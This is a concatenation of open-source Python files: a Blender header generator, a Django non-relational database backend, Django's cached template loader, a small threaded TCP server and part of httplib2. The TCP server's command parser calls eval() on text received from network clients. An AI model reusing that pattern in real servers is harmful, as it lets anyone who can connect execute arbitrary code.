* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
// Auto generated from makesdna dna.c
"""
dtList = dump.DataTypeList
out = "../BlenderSerialize/autogenerated/"
spaces = 4
def addSpaces(file, space):
for i in range(0, space):
file.write(" ")
def write(file, spaces, string):
addSpaces(file, spaces)
file.write(string)
###################################################################################
blender = open(out+"blender.h", 'w')
blender.write(header)
blender.write("#ifndef __BLENDER_H__\n")
blender.write("#define __BLENDER_H__\n")
for dt in dtList:
blender.write("#include \"%s.h\"\n"%dt.filename)
blender.write("#endif//__BLENDER_H__")
blender.close()
###################################################################################
blenderC = open(out+"blender_Common.h", 'w')
blenderC.write(header)
blenderC.write("#ifndef __BLENDERCOMMON_H__\n")
blenderC.write("#define __BLENDERCOMMON_H__\n")
strUnRes = """
// put an empty struct in the case
typedef struct bInvalidHandle {
int unused;
}bInvalidHandle;
"""
blenderC.write(strUnRes)
blenderC.write("namespace Blender {\n")
for dt in dtList:
write(blenderC, 4, "class %s;\n"%dt.name)
blenderC.write("}\n")
blenderC.write("#endif//__BLENDERCOMMON_H__")
blenderC.close()
for dt in dtList:
fp = open(out+dt.filename+".h", 'w')
fp.write(header)
strUpper = dt.filename.upper()
fp.write("#ifndef __%s__H__\n"%strUpper)
fp.write("#define __%s__H__\n"%strUpper)
fp.write("\n\n")
fp.write("// -------------------------------------------------- //\n")
fp.write("#include \"blender_Common.h\"\n")
for i in dt.includes:
fp.write("#include \"%s\"\n"%i)
fp.write("\nnamespace Blender {\n")
fp.write("\n\n")
addSpaces(fp,4)
fp.write("// ---------------------------------------------- //\n")
write(fp, 4, "class %s\n"%dt.name)
write(fp, 4, "{\n")
write(fp, 4, "public:\n")
for i in dt.dataTypes:
write(fp, 8, i+";\n")
write(fp, 4, "};\n")
fp.write("}\n")
fp.write("\n\n")
fp.write("#endif//__%s__H__\n"%strUpper)
fp.close()
| gpl-2.0 |
liqi328/rjrepaircompany | djangotoolbox/db/base.py | 46 | 3591 | import datetime
from django.db.backends import BaseDatabaseFeatures, BaseDatabaseOperations, \
BaseDatabaseWrapper, BaseDatabaseClient, BaseDatabaseValidation, \
BaseDatabaseIntrospection
from .creation import NonrelDatabaseCreation
class NonrelDatabaseFeatures(BaseDatabaseFeatures):
can_return_id_from_insert = True
supports_unspecified_pk = False
supports_regex_backreferencing = True
supports_date_lookup_using_string = False
supports_timezones = False
supports_joins = False
distinguishes_insert_from_update = False
supports_select_related = False
supports_deleting_related_objects = False
string_based_auto_field = False
supports_dicts = False
def _supports_transactions(self):
return False
class NonrelDatabaseOperations(BaseDatabaseOperations):
def __init__(self, connection):
self.connection = connection
super(NonrelDatabaseOperations, self).__init__()
def quote_name(self, name):
return name
def value_to_db_date(self, value):
# value is a date here, no need to check it
return value
def value_to_db_datetime(self, value):
# value is a datetime here, no need to check it
return value
def value_to_db_time(self, value):
# value is a time here, no need to check it
return value
def prep_for_like_query(self, value):
return value
def prep_for_iexact_query(self, value):
return value
def check_aggregate_support(self, aggregate):
from django.db.models.sql.aggregates import Count
if not isinstance(aggregate, Count):
raise NotImplementedError("This database does not support %r "
"aggregates" % type(aggregate))
def year_lookup_bounds(self, value):
return [datetime.datetime(value, 1, 1, 0, 0, 0, 0),
datetime.datetime(value+1, 1, 1, 0, 0, 0, 0)]
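# e.g. year_lookup_bounds(2006) returns the half-open year range
# [datetime(2006, 1, 1, 0, 0, 0, 0), datetime(2007, 1, 1, 0, 0, 0, 0)].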
def pk_default_value(self):
return None
def value_to_db_auto(self, value):
"""
Transform a value to an object compatible with the AutoField required
by the backend driver for auto columns.
"""
if self.connection.features.string_based_auto_field:
if value is None:
return None
return unicode(value)
return super(NonrelDatabaseOperations, self).value_to_db_auto(value)
class NonrelDatabaseClient(BaseDatabaseClient):
pass
class NonrelDatabaseValidation(BaseDatabaseValidation):
pass
class NonrelDatabaseIntrospection(BaseDatabaseIntrospection):
def table_names(self):
"""Returns a list of names of all tables that exist in the database."""
return self.django_table_names()
class FakeCursor(object):
def __getattribute__(self, name):
raise NotImplementedError('Cursors not supported')
def __setattr__(self, name, value):
raise NotImplementedError('Cursors not supported')
class NonrelDatabaseWrapper(BaseDatabaseWrapper):
# These fake operators are required for SQLQuery.as_sql() support.
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': 'LIKE %s',
'icontains': 'LIKE UPPER(%s)',
'regex': '~ %s',
'iregex': '~* %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE %s',
'endswith': 'LIKE %s',
'istartswith': 'LIKE UPPER(%s)',
'iendswith': 'LIKE UPPER(%s)',
}
def _cursor(self):
return FakeCursor()
| bsd-3-clause |
wuga214/Django-Wuga | env/lib/python2.7/site-packages/django/template/loaders/cached.py | 120 | 7116 | """
Wrapper class that takes a list of template loaders as an argument and attempts
to load templates from them in order, caching the result.
"""
import hashlib
import warnings
from django.template import Origin, Template, TemplateDoesNotExist
from django.template.backends.django import copy_exception
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import force_bytes, force_text
from django.utils.inspect import func_supports_parameter
from .base import Loader as BaseLoader
class Loader(BaseLoader):
def __init__(self, engine, loaders):
self.template_cache = {}
self.find_template_cache = {} # RemovedInDjango20Warning
self.get_template_cache = {}
self.loaders = engine.get_template_loaders(loaders)
super(Loader, self).__init__(engine)
def get_contents(self, origin):
return origin.loader.get_contents(origin)
def get_template(self, template_name, template_dirs=None, skip=None):
"""
Perform the caching that gives this loader its name. Often many of the
templates attempted will be missing, so memory use is of concern here.
To keep it in check, caching behavior is a little complicated when a
template is not found. See ticket #26306 for more details.
With template debugging disabled, cache the TemplateDoesNotExist class
for every missing template and raise a new instance of it after
fetching it from the cache.
With template debugging enabled, a unique TemplateDoesNotExist object
is cached for each missing template to preserve debug data. When
raising an exception, Python sets __traceback__, __context__, and
__cause__ attributes on it. Those attributes can contain references to
all sorts of objects up the call chain and caching them creates a
memory leak. Thus, unraised copies of the exceptions are cached and
copies of those copies are raised after they're fetched from the cache.
"""
key = self.cache_key(template_name, template_dirs, skip)
cached = self.get_template_cache.get(key)
if cached:
if isinstance(cached, type) and issubclass(cached, TemplateDoesNotExist):
raise cached(template_name)
elif isinstance(cached, TemplateDoesNotExist):
raise copy_exception(cached)
return cached
try:
template = super(Loader, self).get_template(
template_name, template_dirs, skip,
)
except TemplateDoesNotExist as e:
self.get_template_cache[key] = copy_exception(e) if self.engine.debug else TemplateDoesNotExist
raise
else:
self.get_template_cache[key] = template
return template
def get_template_sources(self, template_name, template_dirs=None):
for loader in self.loaders:
args = [template_name]
# RemovedInDjango20Warning: Add template_dirs for compatibility
# with old loaders
if func_supports_parameter(loader.get_template_sources, 'template_dirs'):
args.append(template_dirs)
for origin in loader.get_template_sources(*args):
yield origin
def cache_key(self, template_name, template_dirs, skip=None):
"""
Generate a cache key for the template name, dirs, and skip.
If skip is provided, only origins that match template_name are included
in the cache key. This ensures each template is only parsed and cached
once if contained in different extend chains like:
x -> a -> a
y -> a -> a
z -> a -> a
"""
dirs_prefix = ''
skip_prefix = ''
if skip:
matching = [origin.name for origin in skip if origin.template_name == template_name]
if matching:
skip_prefix = self.generate_hash(matching)
if template_dirs:
dirs_prefix = self.generate_hash(template_dirs)
return '-'.join(filter(bool, [force_text(template_name), skip_prefix, dirs_prefix]))
def generate_hash(self, values):
return hashlib.sha1(force_bytes('|'.join(values))).hexdigest()
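# For reference (digests abbreviated): a bare lookup keys on the template
# name alone; dirs/skip append sha1 digests of their values, e.g.
#   cache_key('index.html', None)      -> 'index.html'
#   cache_key('index.html', ['/tmpl']) -> 'index.html-<sha1-of-dirs>'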
@property
def supports_recursion(self):
"""
RemovedInDjango20Warning: This is an internal property used by the
ExtendsNode during the deprecation of non-recursive loaders.
"""
return all(hasattr(loader, 'get_contents') for loader in self.loaders)
def find_template(self, name, dirs=None):
"""
RemovedInDjango20Warning: An internal method to lookup the template
name in all the configured loaders.
"""
key = self.cache_key(name, dirs)
try:
result = self.find_template_cache[key]
except KeyError:
result = None
for loader in self.loaders:
try:
template, display_name = loader(name, dirs)
except TemplateDoesNotExist:
pass
else:
origin = Origin(
name=display_name,
template_name=name,
loader=loader,
)
result = template, origin
break
self.find_template_cache[key] = result
if result:
return result
else:
self.template_cache[key] = TemplateDoesNotExist
raise TemplateDoesNotExist(name)
def load_template(self, template_name, template_dirs=None):
warnings.warn(
'The load_template() method is deprecated. Use get_template() '
'instead.', RemovedInDjango20Warning,
)
key = self.cache_key(template_name, template_dirs)
template_tuple = self.template_cache.get(key)
# A cached previous failure:
if template_tuple is TemplateDoesNotExist:
raise TemplateDoesNotExist(template_name)
elif template_tuple is None:
template, origin = self.find_template(template_name, template_dirs)
if not hasattr(template, 'render'):
try:
template = Template(template, origin, template_name, self.engine)
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist,
# back off to returning the source and display name for the template
# we were asked to load. This allows for correct identification (later)
# of the actual template that does not exist.
self.template_cache[key] = (template, origin)
self.template_cache[key] = (template, None)
return self.template_cache[key]
def reset(self):
"Empty the template cache."
self.template_cache.clear()
self.find_template_cache.clear() # RemovedInDjango20Warning
self.get_template_cache.clear()
| apache-2.0 |
niwtr/map-walker | src/server/transmitter.py | 1 | 15362 | #! /usr/bin/python
# -*- coding: utf-8 -*-
'''
Current version : 0.4
2016-5-25
by Heranort
'''
import threading #for thread creation
import socket #socket offical module
import time #time official module
import os #for fortune!
from mailer import mail
from mailer import mailbox
import platform #judge the platform
import sys
from mass_plists import M_A_S_S_PLIST #property list for MASSES
from mass_plists import DISPATCH_PLIST
from log import log_file #log object
'''
################################################################################
M_A_S_S
Modularized Abstract Socket Server (MASS) for TCP linking, and server environment
Authored by Herathol Nortzor
First published: 2016-3-10
################################################################################
'''
'''
################################################################################
Modularized Abstract Socket Server class.
This is an abstraction of an instant-to-use socket server. Needs a property list
to configure and consumes a finite state machine, or cyclic procedure for inner
running machine. When a MASS is instantiated, it creates an abstract server
but doesn't make any bind to the socket. And when the function start() is
called, the MASS would bind to the socket instantly and start working with the
state machine attached. The goal of this is to create an easy-to-use
abstraction of a socket server.
In fact, the REAL MASS would not exist. Each version of MASS is adapted to the
actual use, as is this one.
Happy hacking with the M_A_S_S!
################################################################################
'''
# Route console output through the log file: print() logs at info level,
# prinw() at warning level.
def print(*c, end=''): log_file.info(*c)
def prinw(*c, end=''): log_file.warn(*c)
class M_A_S_S():
plist=[]
sock=[] #the actual socket binding
address=[] #ip address binding. generated below.
com=9999 #com for the socket
machine=print #algorithm machine or procedure
speed=0.5 #the duration for the machine to idle
sock_thread=threading.Thread()
timer=0
'''
Initialize the M_A_S_S, needs a property list and a machine.
The property list is designed for this actual scenario, it would look like this:
{
'name'    : 'SERVER',
'welcome' : 'Enjoy working with MASS.',
'com'     : 9999,
'speed'   : 0.5,
'time'    : 60
}
It is in fact a dictionary of Python. Note that __init__ also reads the
'time' key (the socket accept timeout), so every plist must provide it.
Machine: an algorithm machine, which governs the receive-send cycle and
inner-function algorithm.
'''
def __init__(self,plist,machine):
self.plist=plist
self.server_name=plist['name']
self.server_welcome_string=plist['welcome']
self.address="127.0.0.1" #socket.gethostbyname(socket.gethostname())
self.com=plist['com']
self.speed=plist['speed']
self.time_out=plist['time']
self.machine=machine
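# Illustrative construction (plist values assumed; machine is any callable
# that receives the MASS instance once a client connects):
#   mass = M_A_S_S({'name': 'SERVER', 'welcome': 'hello', 'com': 9999,
#                   'speed': 0.5, 'time': 60}, machine)
#   mass.start()  # binds 127.0.0.1:9999 and serves a single connection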
'''
Procedure for managing the initialization and sweeping of algorithm machine.
It is the entry for the inner algorithm machine.
addr: the address of the connection.
'''
def linque_fn(self, sock, addr):
print(self.server_name+':'+'Accept new connection from %s:%s...' % addr)
print(self.server_name+" bounded to MASS "+str(self))
sock.send(b'established') #connection acknowledge.
self.machine(self)
print(self.server_name+':'+'connection from %s:%s closed.' % addr)
'''
Bind the MASS to actual ip & com. The server should make sure the com is not
in use.
When a MASS is ready, a message of 'waiting for connection' should appear on
the screen.
ip_addr: ip address.
com: com.
'''
def sock_tcp_establish(self, ip_addr, com):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.time_out)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#handle the error that "address is used."
s.bind((ip_addr,com)) #bind socket to this.
s.listen(5)
print (self.server_name+':'+'waiting for connection...')
return s
'''
Send words to the client.
The words must be in type of string.
sock: the socket to send to.
string: the words to be sent.
'''
def speak_to_client(self, string):
estring=string.encode('utf-8')
try:
self.sock.send(estring)
except BrokenPipeError as err:
prinw(self.server_name+': '+"Encounter BROKENPIPE!")
self.sock.close()
self.sock_thread._delete()
def unbound_server(self):
self.sock.close()
'''
Start the server process!
When this function is called, the MASS is about to be put into actual use.
The inner function linque_fn would handle the inner algorithm.
Leave the socket work till an assignment is over.
'''
def start(self):
if not self.sock_thread.isAlive():
s=self.sock_tcp_establish(self.address, self.com)
try:
sock,addr=s.accept()
self.sock=sock
self.sock_thread=threading.Thread(target=self.linque_fn,args=(sock, addr),name='Server'+str(self.com))
self.sock_thread.start() #blocked till connection establishs
except socket.timeout:
prinw(self.server_name+': '+"Connection timeout, unbound.")
'''
################################################################################
Class definition of the packet transmitted between core module and transmitter.
We have to define such packet because we have to mark which MASS server is
sending msgs and which MASS server should the reply mail be sent to .
Thus this class wraps:
1. the MASS binding for current server.
2. the request command, namely, the req.
3. the argument list, yeah it indeed is a tuple.
The request command can be interpreted by the interpreter in core module, and the
argument tuple can be applied to the function interpreted.
################################################################################
'''
class transmitter_packet():
def __init__(self,MASS,func,args):
self.MASS=MASS
self.MASS_NAME=self.MASS.server_name
self.func=func
self.args=args
self.pipe=MASS.speak_to_client
def eval_func(self):
return self.func(*self.args)
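#A usage sketch (assuming `m` is a bound M_A_S_S instance and `mtp` is a
#callable returned by the core interpreter; both names are illustrative):
# pkt=transmitter_packet(m, mtp, (1,[2,3,4]))
# result=pkt.eval_func() #calls mtp(1, [2, 3, 4])
# pkt.pipe(str(result)) #reply through m.speak_to_client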
'''
################################################################################
Runtime environment of the transmission. The playground for MASSES.
env: A list of environment variables.
cmail: The core mailbox.
core_mail_binding: Pipe for communicating with core module.
MASSES: A list of MASSES.
################################################################################
'''
class transmit_env():
current_idling_com = []
'''
Connect the core pipe into this module and initialize the environment itself.
Create the MASSES.
tmail: the mailbox owned by transmitter itself.
cmail: mailbox of the core module.
env: left empty currently.
'''
def __init__(self,core_mail, interpreter):
self.tmail=mailbox('transmitter',50)
self.cmail=core_mail
self.interpreter=interpreter
self.env=[]
self.dispatcher_MASS=[]
self.init_dispatcher_MASS()
self.MASSES=[]
self.MASSN=1
for pl in M_A_S_S_PLIST:
self.MASSES.append(M_A_S_S(pl,self.machine))
def init_dispatcher_MASS(self):
self.dispatcher_MASS=M_A_S_S(DISPATCH_PLIST,self.com_dispatcher_machine)
'''
Used in the tcp_server as the message handler.
Interprets the command received via TCP/IP transmission: translates the
command into a list of messages, which are then sent to the **core** module,
which in turn handles them.
cmd: commands received as a string.
MASS: the MASS currently at work.
In fact this is a message parser: it parses the message fetched from the
client and extracts its structure.
For example the command
mtp::[1,[2,3,4]]
can be parsed into <request_command>:=mtp,
<argument_list> :=[1,[2,3,4]]
trace::[99199,[1,[2,3,4]]]
can be parsed into <request_command>:=trace,
<argument_list> :=[99199, [1,[2,3,4]]], where
current time:=99199
path_list:=[1,[2,3,4]]
and the server should resend the coordinate.
'''
def cmd_evaluator(self,cmd,MASS):
cmd=cmd.split('::') #separate the command by double colons
command=cmd[0] #the first element should be the command
if(len(cmd)<2):
pkt=transmitter_packet(MASS, self.interpreter(command), ())
return pkt
else:
try:
#the argument list, tupled. NOTE: eval() executes client-supplied text,
#so only trusted clients should be allowed to reach this server.
args=tuple(eval(cmd[1]))
pkt=transmitter_packet(MASS,self.interpreter(command),args) #pack up the message
except Exception:
pkt=transmitter_packet(MASS, self.interpreter("err"), cmd)
return pkt
def shutdown_MASS(self, com):
isFound=False
for mass in self.MASSES:
if mass.com==com:
if mass.sock_thread.is_alive():
mass.unbound_server()
self.init_dispatcher_MASS()
isFound=True
return isFound
'''
Algorithm machine. Controls how the MASS works.
Consumes the env and the MASS.
The MASS can be distributed, but the mailer is unique to the env, so the
machine must have a connection to the environment itself.
MASS: the current working MASS
'''
def machine(self,MASS):
'''
Wait for the core module to reply.
Check each mail in the mail list.
Return only once a mail addressed to the current MASS is found.
Bear in mind that a transmitter environment can contain lots of MASSES,
and searching for the reply to a certain MASS is required
because each MASS contains its own machine.
The uniqueness is assured by the MASS itself: for each MASS,
the bound method 'MASS.speak_to_client' is unique.
That is the signature for any of the MASS servers.
For example:
class foo():
def bar(self):
pass
a=foo()
b=foo()
a.bar==b.bar => False
'''
def wait_for_event():
is_event_coming=False
while not is_event_coming: #busy-wait until a reply for this MASS arrives
for mails in self.tmail.maillist:
(fn, args)=mails('describe')
if fn==MASS.speak_to_client:
is_event_coming=True
while True:
'''
Wait for a command from the client.
Will block the thread.
'''
try:
data=MASS.sock.recv(1024)
except OSError:
MASS.unbound_server()
prinw("Encountered OS error.")
break #broken pipe, server shut down
#do NOT sleep here (e.g. time.sleep(MASS.speed)); it can cause a packet to fail.
ddata=data.decode('utf-8')
if not ddata:
prinw(str(MASS.server_name)+': Encountered broken pipe.')
break
if(ddata=='exit'): #this command is not sent to the interpreter.
MASS.speak_to_client('closed')
MASS.unbound_server() #close the sock.
self.init_dispatcher_MASS()
return 0
else: #push the command into the interpreter.
pkt=self.cmd_evaluator(ddata, MASS)
self.tmail.send(self.cmail, lambda x:x, pkt)
#send the function prompt to the core.
wait_for_event() #wait for the response of the core.
self.tmail.pread() #execute all the mails.
'''
For safety, we have to use pread() instead of pread_all:
pread_all is too fast and may cause two packets to be sent at a time.
'''
'''
This machine is introduced because automatic com (port) matching is needed.
It can be seen as the daemon of the actual algorithm machine.
This machine runs briefly before any actual machine appears, returning the
address at which a server idles. Our client then binds itself to the idling
server, after which the connection can be established.
The machine does not care what the client prompts; it just returns the name
of an idling server and closes.
This should take a short time.
'''
def com_dispatcher_machine(self, MASS):
sock=MASS.sock
print(MASS.server_name+': '+'COM_DISPATCHER_MACHINE IS RUNNING.')
time.sleep(MASS.speed)
cic=str(self.current_idling_com)
print('DISPATCHER: DISPATCHING TO COM: '+cic)
MASS.speak_to_client(cic)
return
def get_server_status(self):
idling=[]
working=[]
for mass in self.MASSES:
if mass.sock_thread.is_alive():
working.append(mass.server_name)
else:
idling.append(mass.server_name)
return {
'idling' : idling,
'working' : working
}
'''
Start the servers sequentially.
'''
def seq_start(self):
def mass_counter():
while(1):
num=0
for mass in self.MASSES:
if (mass.sock_thread.is_alive()):
num+=1
if(num==0):
self.MASSN=1
else:
self.MASSN=num
time.sleep(1)
def __seq_start():
for mass in self.MASSES:
if (not mass.sock_thread.is_alive()):
self.current_idling_com=mass.com
self.init_dispatcher_MASS()
self.dispatcher_MASS.start()
mass.start()
a=threading.Thread(target=mass_counter)
a.start()
while 1: #loop forever, re-dispatching any MASS that has gone idle
__seq_start()
time.sleep(2)
| mit |
glob3mobile/qgis-g3m | QGIS-Plugin/webappbuilder/ext-libs/httplib2-0.8-py2.7.egg/httplib2/__init__.py | 246 | 69621 | from __future__ import generators
"""
httplib2
A caching http interface that supports ETags and gzip
to conserve bandwidth.
Requires Python 2.3 or later
Changelog:
2007-08-18, Rick: Modified so it's able to use a socks proxy if needed.
"""
__author__ = "Joe Gregorio ([email protected])"
__copyright__ = "Copyright 2006, Joe Gregorio"
__contributors__ = ["Thomas Broyer ([email protected])",
"James Antill",
"Xavier Verges Farrero",
"Jonathan Feinberg",
"Blair Zajac",
"Sam Ruby",
"Louis Nyffenegger"]
__license__ = "MIT"
__version__ = "0.8"
import re
import sys
import email
import email.Utils
import email.Message
import email.FeedParser
import StringIO
import gzip
import zlib
import httplib
import urlparse
import urllib
import base64
import os
import copy
import calendar
import time
import random
import errno
try:
from hashlib import sha1 as _sha, md5 as _md5
except ImportError:
# prior to Python 2.5, these were separate modules
import sha
import md5
_sha = sha.new
_md5 = md5.new
import hmac
from gettext import gettext as _
import socket
try:
from httplib2 import socks
except ImportError:
try:
import socks
except (ImportError, AttributeError):
socks = None
# Build the appropriate socket wrapper for ssl
try:
import ssl # python 2.6
ssl_SSLError = ssl.SSLError
def _ssl_wrap_socket(sock, key_file, cert_file,
disable_validation, ca_certs):
if disable_validation:
cert_reqs = ssl.CERT_NONE
else:
cert_reqs = ssl.CERT_REQUIRED
# We should be specifying SSL version 3 or TLS v1, but the ssl module
# doesn't expose the necessary knobs. So we need to go with the default
# of SSLv23.
return ssl.wrap_socket(sock, keyfile=key_file, certfile=cert_file,
cert_reqs=cert_reqs, ca_certs=ca_certs)
except (AttributeError, ImportError):
ssl_SSLError = None
def _ssl_wrap_socket(sock, key_file, cert_file,
disable_validation, ca_certs):
if not disable_validation:
raise CertificateValidationUnsupported(
"SSL certificate validation is not supported without "
"the ssl module installed. To avoid this error, install "
"the ssl module, or explicity disable validation.")
ssl_sock = socket.ssl(sock, key_file, cert_file)
return httplib.FakeSocket(sock, ssl_sock)
if sys.version_info >= (2,3):
from iri2uri import iri2uri
else:
def iri2uri(uri):
return uri
def has_timeout(timeout): # python 2.6
if hasattr(socket, '_GLOBAL_DEFAULT_TIMEOUT'):
return (timeout is not None and timeout is not socket._GLOBAL_DEFAULT_TIMEOUT)
return (timeout is not None)
__all__ = [
'Http', 'Response', 'ProxyInfo', 'HttpLib2Error', 'RedirectMissingLocation',
'RedirectLimit', 'FailedToDecompressContent',
'UnimplementedDigestAuthOptionError',
'UnimplementedHmacDigestAuthOptionError',
'debuglevel', 'ProxiesUnavailableError']
# The httplib debug level, set to a non-zero value to get debug output
debuglevel = 0
# A request will be tried 'RETRIES' times if it fails at the socket/connection level.
RETRIES = 2
# Python 2.3 support
if sys.version_info < (2,4):
def sorted(seq):
seq.sort()
return seq
# Python 2.3 support
def HTTPResponse__getheaders(self):
"""Return list of (header, value) tuples."""
if self.msg is None:
raise httplib.ResponseNotReady()
return self.msg.items()
if not hasattr(httplib.HTTPResponse, 'getheaders'):
httplib.HTTPResponse.getheaders = HTTPResponse__getheaders
# All exceptions raised here derive from HttpLib2Error
class HttpLib2Error(Exception): pass
# Some exceptions can be caught and optionally
# be turned back into responses.
class HttpLib2ErrorWithResponse(HttpLib2Error):
def __init__(self, desc, response, content):
self.response = response
self.content = content
HttpLib2Error.__init__(self, desc)
class RedirectMissingLocation(HttpLib2ErrorWithResponse): pass
class RedirectLimit(HttpLib2ErrorWithResponse): pass
class FailedToDecompressContent(HttpLib2ErrorWithResponse): pass
class UnimplementedDigestAuthOptionError(HttpLib2ErrorWithResponse): pass
class UnimplementedHmacDigestAuthOptionError(HttpLib2ErrorWithResponse): pass
class MalformedHeader(HttpLib2Error): pass
class RelativeURIError(HttpLib2Error): pass
class ServerNotFoundError(HttpLib2Error): pass
class ProxiesUnavailableError(HttpLib2Error): pass
class CertificateValidationUnsupported(HttpLib2Error): pass
class SSLHandshakeError(HttpLib2Error): pass
class NotSupportedOnThisPlatform(HttpLib2Error): pass
class CertificateHostnameMismatch(SSLHandshakeError):
def __init__(self, desc, host, cert):
HttpLib2Error.__init__(self, desc)
self.host = host
self.cert = cert
# Open Items:
# -----------
# Proxy support
# Are we removing the cached content too soon on PUT (only delete on 200 Maybe?)
# Pluggable cache storage (supports storing the cache in
# flat files by default. We need a plug-in architecture
# that can support Berkeley DB and Squid)
# == Known Issues ==
# Does not handle a resource that uses conneg and Last-Modified but no ETag as a cache validator.
# Does not handle Cache-Control: max-stale
# Does not use Age: headers when calculating cache freshness.
# The number of redirections to follow before giving up.
# Note that only GET redirects are automatically followed.
# Will also honor 301 requests by saving that info and never
# requesting that URI again.
DEFAULT_MAX_REDIRECTS = 5
try:
# Users can optionally provide a module that tells us where the CA_CERTS
# are located.
import ca_certs_locater
CA_CERTS = ca_certs_locater.get()
except ImportError:
# Default CA certificates file bundled with httplib2.
CA_CERTS = os.path.join(
os.path.dirname(os.path.abspath(__file__ )), "cacerts.txt")
# Which headers are hop-by-hop headers by default
HOP_BY_HOP = ['connection', 'keep-alive', 'proxy-authenticate', 'proxy-authorization', 'te', 'trailers', 'transfer-encoding', 'upgrade']
def _get_end2end_headers(response):
hopbyhop = list(HOP_BY_HOP)
hopbyhop.extend([x.strip() for x in response.get('connection', '').split(',')])
return [header for header in response.keys() if header not in hopbyhop]
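# A quick illustration (hypothetical header values): given a response dict of
# {'connection': 'close, x-foo', 'x-foo': '1', 'content-type': 'text/plain'},
# only ['content-type'] is end-to-end; 'connection' itself and the 'x-foo'
# header it names are treated as hop-by-hop.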
URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")
def parse_uri(uri):
"""Parses a URI using the regex given in Appendix B of RFC 3986.
(scheme, authority, path, query, fragment) = parse_uri(uri)
"""
groups = URI.match(uri).groups()
return (groups[1], groups[3], groups[4], groups[6], groups[8])
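# For example (a sketch):
# parse_uri("http://example.com/a?b#c")
# -> ('http', 'example.com', '/a', 'b', 'c')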
def urlnorm(uri):
(scheme, authority, path, query, fragment) = parse_uri(uri)
if not scheme or not authority:
raise RelativeURIError("Only absolute URIs are allowed. uri = %s" % uri)
authority = authority.lower()
scheme = scheme.lower()
if not path:
path = "/"
# Could do syntax based normalization of the URI before
# computing the digest. See Section 6.2.2 of Std 66.
request_uri = query and "?".join([path, query]) or path
scheme = scheme.lower()
defrag_uri = scheme + "://" + authority + request_uri
return scheme, authority, request_uri, defrag_uri
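# For example (a sketch):
# urlnorm("HTTP://Example.COM/path?q=1")
# -> ('http', 'example.com', '/path?q=1', 'http://example.com/path?q=1')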
# Cache filename construction (original borrowed from Venus http://intertwingly.net/code/venus/)
re_url_scheme = re.compile(r'^\w+://')
re_slash = re.compile(r'[?/:|]+')
def safename(filename):
"""Return a filename suitable for the cache.
Strips dangerous and common characters to create a filename we
can use to store the cache in.
"""
try:
if re_url_scheme.match(filename):
if isinstance(filename,str):
filename = filename.decode('utf-8')
filename = filename.encode('idna')
else:
filename = filename.encode('idna')
except UnicodeError:
pass
if isinstance(filename,unicode):
filename=filename.encode('utf-8')
filemd5 = _md5(filename).hexdigest()
filename = re_url_scheme.sub("", filename)
filename = re_slash.sub(",", filename)
# limit length of filename
if len(filename)>200:
filename=filename[:200]
return ",".join((filename, filemd5))
NORMALIZE_SPACE = re.compile(r'(?:\r\n)?[ \t]+')
def _normalize_headers(headers):
return dict([ (key.lower(), NORMALIZE_SPACE.sub(' ', value).strip()) for (key, value) in headers.iteritems()])
def _parse_cache_control(headers):
retval = {}
if headers.has_key('cache-control'):
parts = headers['cache-control'].split(',')
parts_with_args = [tuple([x.strip().lower() for x in part.split("=", 1)]) for part in parts if -1 != part.find("=")]
parts_wo_args = [(name.strip().lower(), 1) for name in parts if -1 == name.find("=")]
retval = dict(parts_with_args + parts_wo_args)
return retval
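# For example (a sketch):
# _parse_cache_control({'cache-control': 'max-age=3600, no-cache'})
# -> {'max-age': '3600', 'no-cache': 1}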
# Whether to use a strict mode to parse WWW-Authenticate headers
# Might lead to bad results in case of ill-formed header value,
# so disabled by default, falling back to relaxed parsing.
# Set to true to turn on, useful for testing servers.
USE_WWW_AUTH_STRICT_PARSING = 0
# In regex below:
# [^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+ matches a "token" as defined by HTTP
# "(?:[^\0-\x08\x0A-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?" matches a "quoted-string" as defined by HTTP, when LWS have already been replaced by a single space
# Actually, as an auth-param value can be either a token or a quoted-string, they are combined in a single pattern which matches both:
# \"?((?<=\")(?:[^\0-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?(?=\")|(?<!\")[^\0-\x08\x0A-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+(?!\"))\"?
WWW_AUTH_STRICT = re.compile(r"^(?:\s*(?:,\s*)?([^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+)\s*=\s*\"?((?<=\")(?:[^\0-\x08\x0A-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?(?=\")|(?<!\")[^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+(?!\"))\"?)(.*)$")
WWW_AUTH_RELAXED = re.compile(r"^(?:\s*(?:,\s*)?([^ \t\r\n=]+)\s*=\s*\"?((?<=\")(?:[^\\\"]|\\.)*?(?=\")|(?<!\")[^ \t\r\n,]+(?!\"))\"?)(.*)$")
UNQUOTE_PAIRS = re.compile(r'\\(.)')
def _parse_www_authenticate(headers, headername='www-authenticate'):
"""Returns a dictionary of dictionaries, one dict
per auth_scheme."""
retval = {}
if headers.has_key(headername):
try:
authenticate = headers[headername].strip()
www_auth = USE_WWW_AUTH_STRICT_PARSING and WWW_AUTH_STRICT or WWW_AUTH_RELAXED
while authenticate:
# Break off the scheme at the beginning of the line
if headername == 'authentication-info':
(auth_scheme, the_rest) = ('digest', authenticate)
else:
(auth_scheme, the_rest) = authenticate.split(" ", 1)
# Now loop over all the key value pairs that come after the scheme,
# being careful not to roll into the next scheme
match = www_auth.search(the_rest)
auth_params = {}
while match:
